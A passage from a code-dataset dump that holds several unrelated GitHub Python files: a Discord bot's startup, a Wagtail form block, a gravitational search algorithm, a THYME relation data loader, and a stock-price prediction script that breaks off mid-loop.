event in events:\r\n client.load_extension(event)\r\n print(\"===============================\")\r\n print(f\"{len(cogs)} cogs are loaded\\n{len(events)} events are loaded\") \r\n # now load jishaku\r\n client.load_extension(\"jishaku\")\r\n print(\"Jishaku has been loaded!\\n===============================\")\r\n\r\nwith open(\"config.json\", \"r\") as f:\r\n config = json.load(f)\r\n\r\n#consts\r\nBOT_TOKEN = config[\"token\"]\r\nCLIENT_ID = config[\"clientId\"]\r\nCLIENT_SECRET = config[\"clientSecret\"]\r\nPUBLIC_KEY = config[\"publicKey\"]\r\nBOT_PREFIX = config[\"prefix\"]\r\nnew_link =\"https://discordapp.com/oauth2/authorize?&client_id=\".join(str(CLIENT_ID))\r\nnew_link.join(\"&scope=bot&permissions=21474836398\")\r\n\r\n# custom client\r\nclass TheImperialGod(commands.Bot):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n\r\n async def on_ready(self):\r\n print(\"Ready!\")\r\n print(\"Username: \", client.user.name)\r\n print(\"User ID: \", client.user.id)\r\n print(\"----------------------------\")\r\n\r\n async def get_cogs(self):\r\n return cogs\r\n \r\n async def get_events(self):\r\n return events\r\n \r\n async def get_all_emojis(self):\r\n return Emojis\r\n \r\n async def read_json(self, filename):\r\n with open(filename, \"r\") as f:\r\n data = json.load(f)\r\n return data\r\n \r\n async def write_json(self, output, filename):\r\n with open(filename, \"w\") as f:\r\n return json.dump(output, f)\r\n\r\nintents = discord.Intents.all()\r\nclient = TheImperialGod(command_prefix = ['imp ', 'Imp ', 'iMp ', 'IMp ', 'imP ', 'ImP ', 'iMP ', 'IMP '], case_insensitive = True, intents = intents, allowed_mentions = discord.AllowedMentions(everyone = False, users = True, roles = True, replied_user = True)) #making a client object\r\n\r\nasync def ch_pr(): #changing the bots status every 5 secs!!!\r\n await client.wait_until_ready()\r\n while not client.is_closed():\r\n statuses = [\r\n f\"The Protection of {len(client.guilds)} servers\",\r\n \"imp help | imp support 😋\"\r\n ]\r\n status = random.choice(statuses)\r\n await client.change_presence(activity = discord.Streaming(name = status, url = \"https://twitch.tv/pewdiepie\"))\r\n await asyncio.sleep(10)\r\n\r\n@client.event\r\nasync def on_message(message):\r\n try:\r\n if message.content == \"<@!768695035092271124>\":\r\n em = discord.Embed(title = \"Help for TheImperialGod\", color = message.author.color,\r\n description = \"Check some information about me!\")\r\n em.set_author(name = self.client.user.name, icon_url = self.client.user.avatar_url)\r\n em.add_field(name = \"What can I do?\", value = \"I can make your server so charming! Whether you are a moderator or not!\")\r\n em.add_field(name = \"Commands:\", value = \"Check out `imp help` for a list of my commands\")\r\n em.add_field(name = \"Prefix:\", value = \"My prefix is `imp`\")\r\n em.add_field(name = \"Command Types\", value = \"Economy, Moderation, Information, Utilities, Math, Fun, Giveaways, Tickets, Miscellanous\")\r\n em.add_field(name = \"Website:\", value = \"[Click Here](https://nightzan.ml/projects/theimperialgod/index.html)\")\r\n em.set_footer(text = \"© TheImperialGodâ„¢ v1.5.1\",icon_url = self.client.user.avatar_url)\r\n em.set_thumbnail(url = message.author.avatar_url)\r\n await message.channel.send(embed = em)\r\n except:\r\n pass\r\n\r\n await client.process_commands(message)\r\n\r\n\r\nload_cogs()\r\nclient.loop.create_task(ch_pr())\r\nclient.run(BOT_TOKEN)\r\n","repo_name":"Frayer229/imperialgod1","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20764906","text":"from wagtail import blocks\nfrom .conditional_block import ConditionalBlock\n\n\nclass BaseFieldBlock(blocks.StructBlock):\n\n label = blocks.CharBlock(\n max_length=255,\n required=True,\n help_text='The label of the form field.'\n )\n\n required = blocks.BooleanBlock(\n default=False,\n required=False,\n help_text='Tick this box to make this a required field.'\n )\n\n display_checkbox_label = blocks.BooleanBlock(\n default=False,\n required=False,\n help_text='Do you want the checkbox label to display? If not you should populate help_text.'\n )\n\n choices = blocks.ListBlock(\n blocks.TextBlock(\n required=False,\n ),\n )\n\n empty_label = blocks.CharBlock(\n max_length=255,\n required=False,\n )\n\n max_length = blocks.IntegerBlock(\n required=False,\n help_text='Set a maximum length for this field. e.g. 100'\n )\n\n default_value = blocks.CharBlock(\n max_length=255,\n required=False,\n help_text='Set a default value for this field.'\n )\n\n # placeholder = blocks.CharBlock(\n # max_length=255,\n # required=False,\n # help_text='Set a placeholder for the field.'\n # )\n\n help_text = blocks.CharBlock(\n max_length=255,\n required=False,\n help_text='Text to assist the user in populating this field.'\n )\n\n html = blocks.RichTextBlock(\n required=False,\n )\n\n display_side_by_side = blocks.BooleanBlock(\n help_text='Display these items side by side?',\n required=False,\n )\n\n rules = ConditionalBlock(\n required=False,\n help_text='Add conditional rules to show or hide fields depending on the value of other fields in the form.'\n )\n","repo_name":"octavenz/wagtail-advanced-form-builder","sub_path":"wagtail_advanced_form_builder/blocks/fields/base_field_block.py","file_name":"base_field_block.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"34"} +{"seq_id":"24027236772","text":"from reggy.samples.tokens import Target\nfrom reggy.samples.tokens.regex_extra_info import RegexExtraInfo\n\nregex_info_to_tok = {\n\n 'Java' : Target.JAVA,\n 'Perl' : Target.PERL,\n 'POSIX' : Target.POSIX,\n 'egrep' : Target.POSIX,\n 'Python' : Target.PYTHON,\n 'JavaScript' : Target.JAVASCRIPT,\n 'PHP' : Target.PHP,\n 'Golang' : Target.GOLANG,\n 'Rust' : Target.RUST,\n 'C#' : Target.CSHARP,\n 'Scala' : Target.SCALA,\n 'Kotlin' : Target.KOTLIN,\n\n 'Anywhere' : RegexExtraInfo.ANYWHERE,\n 'Start of text': RegexExtraInfo.START_OF_TEXT,\n 'Start of line': RegexExtraInfo.START_OF_LINE,\n 'Start of word': RegexExtraInfo.START_OF_WORD,\n\n 'End of text' : RegexExtraInfo.END_OF_TEXT,\n 'End of line' : RegexExtraInfo.END_OF_LINE,\n 'End of word' : RegexExtraInfo.END_OF_WORD\n\n}\n","repo_name":"steynvl/reggy","sub_path":"server/reggy/reggy/samples/utils/regex_info_to_tok.py","file_name":"regex_info_to_tok.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"29483519705","text":"\nimport numpy as np\nimport random\nimport math\n\n# from benchmark import F16 as test\n\n''' Constant variable '''\nepsilon = 1e-5\nRATE = 20\nK_best = 50\n\nend_thres = 1e-5\n\nclass GSA():\n\n def __init__(self, g_0, dim, num, rate, k, max_iter, u_bound, l_bound, func, end_thres):\n \"\"\" Initialize GSA object \"\"\"\n self.G = g_0 + g_0 * rate # Gravity of the algorithm\n self.G_0 = g_0 # Initial Gravity of the algorithm\n self.dim = dim # Searching dimension\n self.N = num # Number of agent\n self.limit = 0.6*dim*num # Searching limit\n self.rate = rate # Decreasing rate of the gravity\n self.alpha = rate\n self.K = k # K best\n self.max_iter = max_iter # Maximum iteration\n self.K_rate = round(max_iter / 2 /num) # The decrease rate of K\n self.u_bound = u_bound # Upper bound\n self.l_bound = l_bound # Lower bound\n self.func = func # Benchmark function\n self.end_thres = end_thres # Threshold to terminate algorithm\n\n self.M = np.zeros((self.N)) # Mess of the agent\n self.m = np.zeros((self.N)) # Mess calculate by fitness\n self.Total_F = np.zeros((self.N, self.dim)) # Total force of every agent\n self.F = np.zeros((self.N, self.N, self.dim)) # Force of every agent to others\n self.X = np.zeros((self.N, self.dim)) # Position of the agent\n self.V = np.zeros((self.N, self.dim)) # Velocity\n self.A = np.zeros((self.N, self.dim)) # Acceleration\n self.best = 0 # The best value of fitness func.\n self.worst = 0 # The worst value of fitness func.\n self.fit = np.zeros((self.N)) # Fitness value of the agent\n self.best_sofar = 1000000000 # Record best fitness value so far\n self.best_results = np.zeros((self.max_iter)) # Fitness value of the agent\n self.best_results_so_far = np.zeros((self.max_iter)) # Fitness value of the agent\n\n self.last_iter_avg = 0 # Fitness value of the agent\n\n def evaluate(self):\n for i in range(self.N):\n result = self.func(self.X[i])\n if result != 0:\n self.fit[i] = -result\n\n\n def update_v_x_i(self, i):\n for d in range(self.dim):\n self.V[i][d] = random.random() * self.V[i][d] + self.A[i][d]\n self.X[i][d] = self.X[i][d] + self.V[i][d]\n if self.X[i][d] < self.l_bound:\n self.X[i][d] = self.l_bound\n elif self.X[i][d] > self.u_bound:\n self.X[i][d] = self.u_bound\n\n def update_v_x(self):\n for i in range(self.N):\n self.update_v_x_i(i)\n\n def update_G(self, iteration):\n # self.G = self.G - self.G * self.rate\n self.G = self.G_0 * math.exp(-self.alpha * iteration / self.max_iter)\n\n def update_M(self):\n total_mess = np.sum(self.m)\n for i in range(self.N):\n self.M[i] = self.m[i] / total_mess\n\n def update_m(self):\n tmp = (self.best - self.worst)\n if tmp == 0:\n tmp = (self.best * 1.00005) / self.worst\n for i in range(self.N):\n if self.fit[i] != self.worst:\n self.m[i] = (self.fit[i] - self.worst) / tmp\n else:\n self.m[i] = (0.0001) / tmp\n\n def update_A(self):\n for i in range(self.N):\n for d in range(self.dim):\n self.A[i][d] = self.Total_F[i][d] / self.M[i]\n\n def update_K(self, iteration):\n if self.K > 1 and iteration % self.K_rate == 0:\n self.K = self.K - 1\n\n def find_limit(self):\n self.best = self.fit[0] # The best value of fitness func.\n self.worst = self.fit[0] # The worst value of fitness func.\n for i in self.fit:\n if i > self.best:\n self.best = i\n elif i < self.worst:\n self.worst = i\n\n if self.best == -1 and self.worst == -1:\n i = 0\n\n def distance(self, a, b):\n return math.sqrt(np.sum(np.square(a-b)))\n # dis_2 = 0\n # for d in range(self.dim):\n # tmp = a[d] - b[d]\n # dis_2 = dis_2 + tmp * tmp\n # return math.sqrt(dis_2)\n\n\n def force_ijd(self, M_1, M_2, d, pre_cal):\n return pre_cal * (self.X[M_2][d] - self.X[M_1][d])\n\n def force_i(self, M_1):\n for M_2 in range(self.N):\n if M_2 > M_1:\n pre_cal = self.G * self.M[M_1] * self.M[M_2] / (self.distance(self.X[M_1], self.X[M_2]) + epsilon)\n for d in range(self.dim):\n m2_to_m1_f = self.force_ijd(M_1, M_2, d, pre_cal)\n self.F[M_1][M_2][d] = m2_to_m1_f\n self.F[M_2][M_1][d] = -m2_to_m1_f\n\n def update_f(self):\n for i in range(self.N):\n self.force_i(i)\n\n def total_force_i(self, M_i, sort_index):\n for d in range(self.dim):\n self.Total_F[M_i][d] = 0\n for i in range(self.K):\n if sort_index[i] != M_i:\n f = self.F[M_i][sort_index[i]][d]\n self.Total_F[M_i][d] = self.Total_F[M_i][d] + random.random() * self.F[M_i][sort_index[i]][d]\n\n def update_total_f(self):\n sort_index = np.argsort(self.fit)\n sort_index = np.flip(sort_index)\n for i in range(self.N):\n self.total_force_i(i, sort_index)\n\n def triger(self, iteration):\n upper = lower = self.best_results[iteration]\n if iteration > 100:\n for i in range(20):\n if upper < self.best_results[iteration - i]:\n upper = self.best_results[iteration - i]\n\n elif lower > self.best_results[iteration - i]:\n lower = self.best_results[iteration - i]\n if(upper-lower) < self.end_thres:\n self.best_results[iteration:] = self.best_results[iteration]\n self.best_results_so_far[iteration:] = self.best_results_so_far[iteration]\n #print(self.best_results_so_far[2000])\n return True\n else:\n return False\n\n\n def result(self, iteration):\n sort_index = np.argsort(self.fit)\n sort_index = np.flip(sort_index)\n self.best_results[iteration] = self.func(self.X[sort_index[0]])\n if self.best_sofar > self.best_results[iteration]:\n self.best_sofar = self.best_results[iteration]\n self.best_results_so_far[iteration] = self.best_sofar\n\n # if iteration == (self.max_iter-1):\n # total_agent_value = np.apply_along_axis(self.func, axis=1, arr=self.X)\n # self.last_iter_avg = np.average(total_agent_value)\n\n # print(\"Best fitness: \",self.func(self.X[sort_index[0]]) )\n print(\"Best: \",self.X[sort_index[0]], \"fitness: \", self.best_results[iteration])\n return self.triger(iteration)\n\n\n # def gsa_init(self):\n # # Initialize food source for all employed bees\n # for i in range(self.N):\n # self.X[i] = np.random.uniform(self.l_bound,self.u_bound, (self.dim))\n # self.fit[i] = self.func(self.X[i])\n\n def gsa_init(self, X=None):\n # Initialize food source for all employed bees\n if X is None:\n for i in range(self.N):\n self.X[i] = np.random.uniform(self.l_bound,self.u_bound, (self.dim))\n self.fit[i] = self.func(self.X[i])\n else:\n if X.shape == self.X.shape:\n self.X = X.copy()\n self.fit = np.apply_along_axis(self.func, axis=1, arr=self.X)\n else:\n raise Exception(\"Custom data shape error\")\n\n\n '''\n One Iteration of the gsa algorithm\n '''\n def gsa_iter(self, iteration):\n # Evaluate the fitness\n self.evaluate()\n\n # Update G\n self.update_G(iteration)\n\n # find limit\n self.find_limit()\n\n # Calculate Mess\n self.update_m()\n self.update_M()\n self.update_K(iteration)\n\n # Calculate force\n self.update_f()\n self.update_total_f()\n\n # Calculate Acceleration\n self.update_A()\n\n self.update_v_x()\n\n\n def algorithm(self, arr):\n # Initial\n self.gsa_init(arr)\n\n # iteration\n for iteration in range(self.max_iter):\n self.gsa_iter(iteration)\n end = self.result(iteration)\n if end:\n break\n\n def get_current_fitness(self):\n \"\"\" Get current fitness of each agent \"\"\"\n return np.apply_along_axis(self.func, axis=1, arr=self.X)\n\n\nif __name__ == \"__main__\":\n f7 = GSA (g_0 = 100, dim=test.dim, num=50, rate=RATE, k=K_best, max_iter=2500, u_bound=test.u_bound, l_bound=test.l_bound, func=test.func, end_thres=end_thres)\n arr = np.random.uniform(test.l_bound,test.u_bound, (50, test.dim))\n f7.algorithm(arr)\n\n # Calculate mean fitness\n fitness_array = f7.get_current_fitness()\n mean_fitness = np.mean(fitness_array)\n print(mean_fitness)","repo_name":"Ernie-Wang/IC_HW1","sub_path":"gsa.py","file_name":"gsa.py","file_ext":"py","file_size_in_byte":9589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74222845537","text":"# inventory.py\nfrom utils import slow_type\nfrom colorama import init, Fore, Back, Style\n\ndef use_item(player, item_index):\n \"\"\"Use the selected item from the player's inventory.\"\"\"\n item = player.inventory[item_index]\n\n # Handle the specific logic for the item\n if 'Healing Potion' in item['name']:\n player.health += int(item['healing_amount'])\n if player.health > player.max_health:\n player.health = player.max_health\n slow_type(f\"You used a {Fore.YELLOW}{item['name']}{Fore.RESET} and restored {Fore.GREEN}{Style.BRIGHT}{item['healing_amount']}{Style.RESET_ALL} health points!\")\n # Remove the used item from the player's inventory\n player.inventory.pop(item_index)\n","repo_name":"VladDoesCode/Arx-New","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"45771219621","text":"# encoding:utf-8\nimport copy\nimport numpy as np\nimport random\n\nN = int(input())\nMOD = 10**9+7\nmemo = [{} for i in range(N+1)]\n\ndef check(last4):\n for i in range(4):\n t = list(last4)\n if i >= 1:\n t[i-1],t[i] = t[i],t[i-1]\n\n if \"\".join(t).count(\"AGC\") >= 1:\n return False\n\n return True\n\ndef dfs(cur,last3):\n if last3 in memo[cur]:\n return memo[cur][last3]\n if cur == N:\n return 1\n ret = 0\n for c in \"AGCT\":\n if check(last3+c):\n ret = (ret + dfs(cur+1,last3[1:]+c))%MOD\n memo[cur][last3] = ret\n return ret\n\nprint(dfs(0,\"TTT\"))\n# for i in range(N):\n# print(memo[i])\n# print(memo)\n","repo_name":"seven320/AtCoder","sub_path":"122/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"8295635256","text":"from cec2017.functions import f3 as func\nimport numpy as np\nimport mealpy.evolutionary_based.GA as ga\nimport mealpy.evolutionary_based.DE as de\nimport mealpy.swarm_based.BeesA as ba\nimport os \n\npath = 'results'\nif not os.path.exists(path):\n os.makedirs(path)\n\nn_times = 51\nalg = func.__name__\n\ndim = int(input(\"Dimensão: \"))\nexecutions = 1000\n\nresults = []\n\ndef fit(solution):\n solution = np.reshape(solution, (1, dim))\n val = func(solution)\n\n return val\n\n \nterm_dict = {\n 'max_fe': 10000 * dim,\n}\n\nga1 = ba.CleverBookBeesA(3500,50)\nusing_alg = ga1.name\n\n\nfor i in range(0,n_times):\n\n problem = {\n \"fit_func\": fit,\n \"lb\": [-100, ] * dim,\n \"ub\": [100, ] * dim,\n \"minmax\":\"min\",\n \"n_dims\":dim,\n \"obj_weights\":np.ones(executions),\n }\n \n best_fit, best_sol = ga1.solve(problem,'thread', termination = term_dict,n_workers=6)\n \n results.append(best_sol)\n \nwith open(f'results/result_{using_alg}_{dim}_{alg}.txt','w') as compiled:\n i = 0\n for sol in results:\n compiled.write(f'Execução {i}: {sol}\\n')\n i += 1\n\n ","repo_name":"nicolassoam/comp-evol","sub_path":"trabalho-2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31701933114","text":"\"\"\"Representation of clowder yaml loader\n\n.. codeauthor:: Joe DeCapo \n\n\"\"\"\n\nfrom typing import List, Optional\n\nfrom clowder.util.git import Protocol\n\nfrom .clowder import Clowder\nfrom .defaults import Defaults\nfrom .source import Source, SourceName\n\n\nclass ClowderBase:\n \"\"\"clowder yaml base class\n\n :ivar str name: Name of clowder\n :ivar Optional[Defaults] defaults: Name of clowder\n :ivar Optional[List[Source]] sources: Sources\n :ivar Clowder clowder: Clowder model\n :ivar Optional[Protocol] protocol: Git protocol\n \"\"\"\n\n def __init__(self, yaml: dict):\n \"\"\"Upstream __init__\n\n :param dict yaml: Parsed yaml dict\n \"\"\"\n\n self.name: str = yaml[\"name\"]\n self.defaults: Optional[Defaults] = Defaults(yaml[\"defaults\"]) if \"defaults\" in yaml else None\n self.sources: Optional[List[Source]] = None\n if \"sources\" in yaml:\n self.sources: Optional[List[Source]] = [Source(SourceName(name), source)\n for name, source in yaml[\"sources\"].items()]\n protocol = yaml.get(\"protocol\", None)\n self.protocol: Optional[Protocol] = None if protocol is None else Protocol(protocol)\n self.clowder: Clowder = Clowder(yaml[\"clowder\"])\n\n def get_yaml(self, resolved: bool = False) -> dict:\n \"\"\"Return python object representation for saving yaml\n\n :param bool resolved: Whether to get resolved commit hashes\n :return: YAML python object\n \"\"\"\n\n yaml = {\n \"name\": self.name\n }\n\n if self.protocol is not None:\n yaml['protocol'] = self.protocol.value\n if self.sources is not None:\n yaml['sources'] = {s.name: s.get_yaml() for s in self.sources}\n if self.defaults is not None:\n yaml['defaults'] = self.defaults.get_yaml()\n\n yaml[\"clowder\"] = self.clowder.get_yaml(resolved=resolved)\n\n return yaml\n","repo_name":"JrGoodle/clowder","sub_path":"clowder/model/clowder_base.py","file_name":"clowder_base.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"31865469061","text":"#!/usr/bin/env python3\n\nimport sys\nsys.dont_write_bytecode = True\nsys.path.append('../Anafora')\n\nimport os, configparser, glob\nfrom tqdm import tqdm\nfrom cassis import *\n\ntype_system_path = './TypeSystem.xml'\n\nsplits = {\n 'train': set([0,1,2,3]),\n 'dev': set([4,5]),\n 'test': set([6,7])}\n\nlabel2int = {'NONE':0, 'CONTAINS':1, 'CONTAINS-1':2}\nint2label = {0:'NONE', 1:'CONTAINS', 2:'CONTAINS-1'}\n\n# ctakes type system types\nrel_type = 'org.apache.ctakes.typesystem.type.relation.TemporalTextRelation'\nevent_type = 'org.apache.ctakes.typesystem.type.textsem.EventMention'\ntime_type = 'org.apache.ctakes.typesystem.type.textsem.TimeMention'\nsent_type = 'org.apache.ctakes.typesystem.type.textspan.Sentence'\n\ndef index_relations(gold_view):\n \"\"\"Map arguments to relation types\"\"\"\n\n rel_lookup = {}\n\n for rel in gold_view.select(rel_type):\n arg1 = rel.arg1.argument\n arg2 = rel.arg2.argument\n\n if rel.category == 'CONTAINS':\n rel_lookup[(arg1, arg2)] = rel.category\n\n return rel_lookup\n\ndef get_context(sent, larg, rarg, lmarker, rmarker):\n \"\"\"Build a context string using left and right arguments and their markers\"\"\"\n\n sent_text = sent.get_covered_text()\n left_text = larg.get_covered_text()\n right_text = rarg.get_covered_text()\n\n left_context = sent_text[: larg.begin - sent.begin]\n middle_context = sent_text[larg.end - sent.begin : rarg.begin - sent.begin]\n right_context = sent_text[rarg.end - sent.begin :]\n\n left_start = ' [s%s] ' % lmarker\n left_end = ' [e%s] ' % lmarker\n right_start = ' [s%s] ' % rmarker\n right_end = ' [e%s] ' % rmarker\n\n context = left_context + left_start + left_text + left_end + \\\n middle_context + right_start + right_text + \\\n right_end + right_context\n\n return context.replace('\\n', '')\n\nclass RelData:\n \"\"\"Make x and y from XMI files for train, dev, or test partition\"\"\"\n\n def __init__(\n self,\n xmi_dir,\n partition='train',\n n_files='all'):\n \"\"\"\"Xml ref and out dirs would typically be given for a test set\"\"\"\n\n self.xmi_dir = xmi_dir\n self.partition = partition\n self.n_files = None if n_files == 'all' else int(n_files)\n\n def event_time_relations(self):\n \"\"\"Make x, y etc. for a specified partition\"\"\"\n\n texts = []\n labels = []\n\n type_system_file = open(type_system_path, 'rb')\n type_system = load_typesystem(type_system_file)\n\n xmi_paths = glob.glob(self.xmi_dir + '*.xmi')[:self.n_files]\n caption = 'reading %s data' % self.partition\n for xmi_path in tqdm(xmi_paths, desc=caption):\n\n # does this xmi belong to the sought partition?\n xmi_file_name = xmi_path.split('/')[-1]\n id = int(xmi_file_name.split('_')[0][-3:])\n if id % 8 not in splits[self.partition]:\n continue\n\n xmi_file = open(xmi_path, 'rb')\n cas = load_cas_from_xmi(xmi_file, typesystem=type_system)\n gold_view = cas.get_view('GoldView')\n sys_view = cas.get_view('_InitialView')\n\n rel_lookup = index_relations(gold_view)\n\n # iterate over sentences, extracting relations\n for sent in sys_view.select(sent_type):\n for event in gold_view.select_covered(event_type, sent):\n for time in gold_view.select_covered(time_type, sent):\n\n label = 'NONE'\n if (time, event) in rel_lookup:\n label = rel_lookup[(time, event)]\n if (event, time) in rel_lookup:\n label = rel_lookup[(event, time)] + '-1'\n\n if time.begin < event.begin:\n context = get_context(sent, time, event, 't', 'e')\n else:\n context = get_context(sent, event, time, 'e', 't')\n\n texts.append(context)\n labels.append(label2int[label])\n\n return texts, labels\n\nif __name__ == \"__main__\":\n\n cfg = configparser.ConfigParser()\n cfg.read(sys.argv[1])\n base = os.environ['DATA_ROOT']\n\n rel_data = RelData(\n os.path.join(base, cfg.get('data', 'xmi_dir')),\n partition='train',\n n_files=10)\n\n inputs, labels = rel_data.event_time_relations()\n\n import collections\n print('unique labels:', collections.Counter(labels))\n\n # print a few 'contains' samples\n for input, label in zip(inputs, labels):\n if label == 1:\n print(input)\n","repo_name":"dmitriydligach/Thyme","sub_path":"Et/reldata.py","file_name":"reldata.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74023991457","text":"import pandas as pd\r\nimport plotly.graph_objs as go\r\nimport plotly.express as px\r\nimport pickle\r\nimport numpy as np\r\nimport yfinance as yf\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, explained_variance_score, r2_score\r\nfrom sklearn.metrics import mean_poisson_deviance, mean_gamma_deviance, accuracy_score\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.svm import SVR\r\nimport firebase_admin\r\nfrom firebase_admin import credentials\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\n# cred = credentials.Certificate(\"key.json\")\r\n# firebase_admin.initialize_app(cred)\r\n\r\n\r\ndef crypt_data(coin, start_date, end_date):\r\n cryptData = yf.download(coin, start=start_date, end=end_date, group_by=\"ticker\")\r\n return cryptData\r\n\r\n\r\ndef trainModelForStock(coin='AAPL', start_date=\"1990-01-01\", end_date=\"2022-12-31\",\r\n models=RandomForestRegressor(random_state=0), type_model='ml'):\r\n try:\r\n # Get Data\r\n data = crypt_data(coin, start_date, end_date)\r\n\r\n # Fill Empty Data by interpolation\r\n data = data.fillna(method='ffill')\r\n\r\n # Split Data\r\n x = data.drop(['Close'], axis=1).values\r\n y = data.Close\r\n\r\n scalery = MinMaxScaler(feature_range=(0, 1))\r\n y = scalery.fit_transform(np.array(y).reshape(-1, 1))\r\n\r\n model_name1 = coin + \"_scalery.sav\"\r\n pickle.dump(scalery, open(model_name1, 'wb'))\r\n\r\n if type_model == 'ml':\r\n # Train Model\r\n models.fit(x, y.ravel())\r\n print(\"Model Trained\")\r\n model_name = coin + \"_Model.sav\"\r\n pickle.dump(models, open(model_name, 'wb'))\r\n return models\r\n\r\n except:\r\n print(\"Error Occurred, check Inputs and train again.\")\r\n return None\r\n\r\n\r\ndef predictionModel(coin_stock, model, prediction_start_date, prediction_end_date,scmodely):\r\n p_data = crypt_data(coin_stock, prediction_start_date, prediction_end_date)\r\n true = p_data['Close']\r\n p_data = p_data.drop('Close', axis=1)\r\n pred = model.predict(p_data)\r\n data_pred = pred.reshape(-1, 1)\r\n data_pred = scmodely.inverse_transform(data_pred)\r\n p_data['Close'] = data_pred\r\n\r\n year_data = price_per_year(p_data, coin_stock)\r\n six_data = price_per_six_month(p_data, coin_stock)\r\n return year_data, six_data, p_data\r\n\r\n\r\ndef price_per_year(data, coin):\r\n years = list(data.index.year.unique())\r\n df_year = pd.DataFrame()\r\n\r\n for year in years:\r\n year_open = data.loc[data.index.year == year, 'Open'][0]\r\n year_close = data.loc[data.index.year == year, 'Close'][-1]\r\n year_low = data.loc[data.index.year == year, 'Low'].min()\r\n year_high = data.loc[data.index.year == year, 'High'].max()\r\n\r\n df_year[year] = pd.Series([year_open, year_close, year_low, year_high])\r\n\r\n df_year = df_year.T\r\n df_year = df_year.set_axis(['open', 'close', 'low', 'high'], axis=1)\r\n\r\n # Calculate % change between the open and close price of the year\r\n df_year['Year Change'] = 100 * (df_year['close'] - df_year['open']) / df_year['open']\r\n\r\n\r\n annotations_list = []\r\n max_high = df_year['high'].max()\r\n\r\n for year in years:\r\n df_aux = df_year.loc[df_year.index == year]\r\n loc_x = pd.to_datetime(df_aux.index[0], format='%Y')\r\n loc_y = df_aux['high'].values[0] / max_high + 0.05\r\n text = '{:.1f}%'.format(df_aux['Year Change'].values[0])\r\n\r\n annotation = dict(x=loc_x, y=loc_y,\r\n xref='x', yref='paper',\r\n showarrow=False, xanchor='center',\r\n text=text)\r\n\r\n annotations_list.append(annotation)\r\n\r\n # Interactive candlestick chart with Plotly\r\n candlestick = go.Candlestick(\r\n x=pd.to_datetime(df_year.index, format='%Y'),\r\n open=df_year.open,\r\n close=df_year.close,\r\n low=df_year.low,\r\n high=df_year.high\r\n )\r\n\r\n fig = go.Figure(data=[candlestick])\r\n\r\n fig.update_layout(\r\n autosize=False,\r\n width=500,\r\n height=300,\r\n title=dict(text=coin + '/USD yearly chart', font=dict(size=18)),\r\n yaxis_title=dict(text='Price (USD)', font=dict(size=13)),\r\n margin=dict(l=0, r=20, t=55, b=20),\r\n xaxis_rangeslider_visible=False,\r\n annotations=annotations_list,\r\n paper_bgcolor='rgba(0, 0, 0, 0)'\r\n\r\n )\r\n fig.show()\r\n\r\n return df_year\r\n\r\n\r\ndef price_per_six_month(data, coin):\r\n data['Date'] = pd.to_datetime(data.index)\r\n data['Month'] = data.Date.dt.month\r\n years = list(data.index.year.unique())\r\n months = list(data.Month.unique())\r\n df_month = pd.DataFrame()\r\n try:\r\n for year in years:\r\n months_open = data.loc[(data.index.year == year) & (data.Month == 6), 'Open'][0]\r\n months_close = data.loc[(data.index.year == year) & (data.Month == 6), 'Close'][-1]\r\n months_low = data.loc[(data.index.year == year) & (data.Month == 6), 'Low'].min()\r\n months_high = data.loc[(data.index.year == year) & (data.Month == 6), 'High'].max()\r\n\r\n df_month[year] = pd.Series([months_open, months_close, months_low, months_high])\r\n\r\n df_month = df_month.T\r\n df_month = df_month.set_axis(['open', 'close', 'low', 'high'], axis=1)\r\n\r\n # Calculate % change between the open and close price of the 6th month\r\n df_month['Sixth Month Change'] = 100 * (df_month['close'] - df_month['open']) / df_month['open']\r\n\r\n\r\n return df_month\r\n\r\n except Exception as e:\r\n print(e)\r\n return 0\r\n\r\n\r\n# Train Model Configuration\r\ncoin_list = [\"BTC-USD\", \"ETH-USD\", \"GOOG\", \"TSLA\", \"AAPL\", \"MSFT\", \"AMZN\"]\r\nfor coin_stock in coin_list:\r\n print(\"Training Coin\", coin_stock)\r\n model = SVR(kernel='rbf', C=1e2, gamma=0.1)\r\n start_date = '1990-01-01'\r\n type_model = 'ml'\r\n print(trainModelForStock.__doc__)\r\n model_train = trainModelForStock(coin=coin_stock, start_date=start_date, models=model, type_model=type_model)\r\n\r\n# Prediction Configuration\r\n\r\nprediction_start_date = '2021-01-01'\r\nprediction_end_date = '2022-01-01'\r\n\r\nmodel_list = [\"BTC-USD_Model.sav\", \"ETH-USD_Model.sav\", \"GOOG_Model.sav\", \"TSLA_Model.sav\", \"AAPL_Model.sav\", \"MSFT_Model.sav\", \"AMZN_Model.sav\"]\r\nscaler_list = [\"BTC-USD_scalery.sav\", \"ETH-USD_scalery.sav\", \"GOOG_scalery.sav\", \"TSLA_scalery.sav\", \"AAPL_scalery.sav\", \"MSFT_scalery.sav\", \"AMZN_scalery.sav\"]\r\n\r\nfor i in range(len(model_list)):\r\n model = pickle.load(open(model_list[i], 'rb'))\r\n scy = pickle.load(open(scaler_list[i], 'rb'))\r\n\r\n 